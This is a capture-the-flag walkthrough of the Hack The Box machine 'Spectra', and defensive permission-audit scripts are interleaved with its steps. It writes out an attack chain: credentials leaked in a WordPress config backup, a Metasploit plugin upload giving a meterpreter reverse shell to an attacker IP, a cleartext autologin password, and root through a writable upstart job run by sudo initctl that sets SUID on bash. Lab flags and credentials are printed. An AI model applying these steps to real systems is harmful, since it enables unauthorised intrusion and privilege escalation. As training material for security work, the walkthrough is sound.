Hack-The-Box-walkthrough[Spectra]

Introduction

OS: Other
Difficulty: Easy
Points: 20
Release: 27 Feb 2021
IP: 10.10.10.229

information gathering

First, run nmap as usual:

┌──(root💀kali)-[~/hackthebox/machine/spectra]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.229
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
80/tcp open http nginx 1.17.4
3306/tcp open mysql MySQL (unauthorized)

A simple gobuster scan reveals two directories, /main and /testing.

Port 80 serves a live web server. The /testing directory exposes a set of configuration files; the wp-config.php.save backup contains the database username and password, which we can reuse to log in to the WordPress site.

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );
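The finding above is an editor/backup copy of a config file left inside the document root, which nginx serves as plain text. The following is an added example (not code from the walkthrough) of a check an administrator can run against a web root before deploying; the suffix list is an assumption of which leftovers are worth flagging.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: list backup/editor copies
# of files under a web root. A web server treats them as static files, so a
# wp-config.php.save (as on this machine) hands out database credentials.
# The suffix list is an assumption; extend it for your own editors and tools.
find_backup_configs() {
    webroot="$1"
    find "$webroot" -type f \( -name '*.save' -o -name '*.bak' -o -name '*.orig' \
        -o -name '*.old' -o -name '*~' -o -name '*.swp' \) 2>/dev/null | sort
}

# Exit 0 when no leftovers exist, 1 otherwise, so it can gate a deploy script.
webroot_is_clean() {
    [ -z "$(find_backup_configs "$1")" ]
}
```

Besides removing the files, the matching server-side mitigation is an nginx `location` block that matches those suffixes and returns `deny all;`, so a stray backup is never served even if the deploy check is skipped.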

get user

Use administrator/devteam01 to log in.

After logging in we land on the Dashboard, where external plugins can be installed. From here we could upload a plugin manually and get a shell, but that takes time, so let's use another method with msf instead.

msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD devteam01 yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS spectra.htb yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /main/ yes The base path to the wordpress application
USERNAME administrator yes The WordPress username to authenticate with
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.22 yes The listen address (an interface may be specified)
LPORT 4455 yes The listen port


Exploit target:

Id Name
-- ----
0 WordPress

Now we have a shell. Cat out the /opt/autologin.conf.orig file: it points to a passwd file in the /etc/autologin directory, which simply contains the password of the katie user.

meterpreter > cat /opt/autologin.conf.orig
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
description "Automatic login at boot"
author "chromium-os-dev@chromium.org"
# After boot-complete starts, the login prompt is visible and is accepting
# input.
start on started boot-complete
script
passwd=
# Read password from file. The file may optionally end with a newline.
for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
if [ -e "${dir}/passwd" ]; then
passwd="$(cat "${dir}/passwd")"
break
fi
done
if [ -z "${passwd}" ]; then
exit 0
fi
# Inject keys into the login prompt.
#
# For this to work, you must have already created an account on the device.
# Otherwise, no login prompt appears at boot and the injected keys do the
# wrong thing.
/usr/local/sbin/inject-keys.py -s "${passwd}" -k enter

meterpreter > pwd
/etc/autologin
meterpreter > ls
Listing: /etc/autologin
=======================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 19 fil 2021-02-03 19:43:24 -0500 passwd

meterpreter > cat passwd
SummerHereWeCome!!
meterpreter > ls /home
Listing: /home
==============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40700/rwx------ 4096 dir 2020-07-20 05:53:17 -0400 .shadow
40755/rwxr-xr-x 4096 dir 2021-02-27 14:16:50 -0500 chronos
40755/rwxr-xr-x 4096 dir 2021-02-28 15:30:54 -0500 katie
40755/rwxr-xr-x 4096 dir 2021-02-28 14:47:17 -0500 nginx
41751/rwxr-x--x 4096 dir 2020-07-20 05:53:17 -0400 root
40755/rwxr-xr-x 4096 dir 2020-07-20 05:53:17 -0400 user

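The autologin job runs as root and reads the password from one of two fixed directories, so the file never needs to be readable by anyone else; on this box it is mode 644, which is why a web-server shell could read it. The following is an added example (not from the walkthrough) of an audit for that condition. The directories are taken as arguments (an assumption) so the same function can be pointed at a scratch tree instead of the real /mnt/stateful_partition/etc/autologin and /etc/autologin.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: flag autologin passwd
# files whose group/other permission bits are set. Takes the directories to
# inspect as arguments (assumption) so it can be tested on a scratch tree.
audit_autologin_passwd() {
    findings=0
    for dir in "$@"; do
        f="$dir/passwd"
        [ -e "$f" ] || continue
        mode=$(stat -c '%a' "$f")    # GNU stat: octal permission bits, e.g. 644
        owner=$(stat -c '%U' "$f")
        # Only the last two digits (group, other) matter; the job itself runs as root.
        case "$mode" in
            *00|0) echo "ok: $f mode=$mode owner=$owner" ;;
            *)     echo "FINDING: $f mode=$mode owner=$owner group/other permission bits set"
                   findings=$((findings + 1)) ;;
        esac
    done
    # Non-zero exit when anything was flagged, so a cron job or CI step can alert on it.
    [ "$findings" -eq 0 ]
}
```

Run it as root on the two autologin directories; a clean host prints only `ok:` lines and exits 0. The cleartext secret is the real weakness, but until the mechanism is replaced, 0600 root-owned is the minimum.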
┌──(root💀kali)-[~/hackthebox/machine/spectra]
└─# ssh katie@spectra.htb
The authenticity of host 'spectra.htb (10.10.10.229)' can't be established.
RSA key fingerprint is SHA256:lr0h4CP6ugF2C5Yb0HuPxti8gsG+3UY5/wKjhnjGzLs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'spectra.htb,10.10.10.229' (RSA) to the list of known hosts.
Password:
katie@spectra ~ $ id
uid=20156(katie) gid=20157(katie) groups=20157(katie),20158(developers)
katie@spectra ~ $ whoami
katie
katie@spectra ~ $ ls
log user.txt
katie@spectra ~ $ cat user.txt
e89d27fe195e9114ffa72ba8913a6130

And we have the user flag.

get root

After running sudo -l we learn that we can run the /sbin/initctl command. If you don't know what initctl does, read this:

  • initctl - init daemon control tool

Now edit /etc/init/test.conf and add these lines:

script

chmod +s /bin/bash

end script

Now start the job:

katie@spectra /etc/init $ sudo /sbin/initctl start test
test start/running, process 48988

Then run:

katie@spectra ~ $ /bin/bash -p
bash-4.3# id
uid=20156(katie) gid=20157(katie) euid=0(root) egid=0(root) groups=0(root),20157(katie),20158(developers)
bash-4.3# whoami
root
bash-4.3# cd /root
bash-4.3# ls
main nodetest.js root.txt script.sh startup test.conf
bash-4.3# cat root.txt
d44519713b889d5e1f9e536d0c6df2fc
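The escalation above needs two things at once: a sudo rule that lets a user drive initctl, and a job file under /etc/init that the same user can edit. The following is an added example (not from the walkthrough) of an audit for the second condition; the directory is an argument (an assumption) so the check can be exercised on a scratch copy.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: report upstart job files
# that are writable by group or other. Every *.conf under /etc/init should be
# root-owned and mode 644 or tighter; a writable one plus "sudo initctl" is the
# root shell shown above. Directory is an argument (assumption) for testing.
audit_init_jobs() {
    dir="$1"
    bad=0
    for job in "$dir"/*.conf; do
        [ -e "$job" ] || continue
        mode=$(stat -c '%a' "$job")   # GNU stat: octal bits, e.g. 664 or 4755
        owner=$(stat -c '%U' "$job")
        # Write bit is 2; group digit is second-to-last, other digit is last.
        case "$mode" in
            *[2367][0-7]|*[2367])
                echo "FINDING: $job mode=$mode owner=$owner writable by group or other"
                bad=1 ;;
            *)
                [ "$owner" = "root" ] || echo "note: $job owned by $owner, not root"
                echo "ok: $job mode=$mode owner=$owner" ;;
        esac
    done
    return "$bad"
}
```

Pair its output with `sudo -l` for each interactive account: a writable job file is only a root path when some user can also start jobs with elevated privileges, and the fix is either to drop that sudo entry or to make the job directory root-only.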

Summary of knowledge

  • Directory enumeration and an exposed wp-config.php.save backup
  • WordPress plugin upload (wp_admin_shell_upload)
  • sudo /sbin/initctl privilege escalation via a writable upstart job

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I'm lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…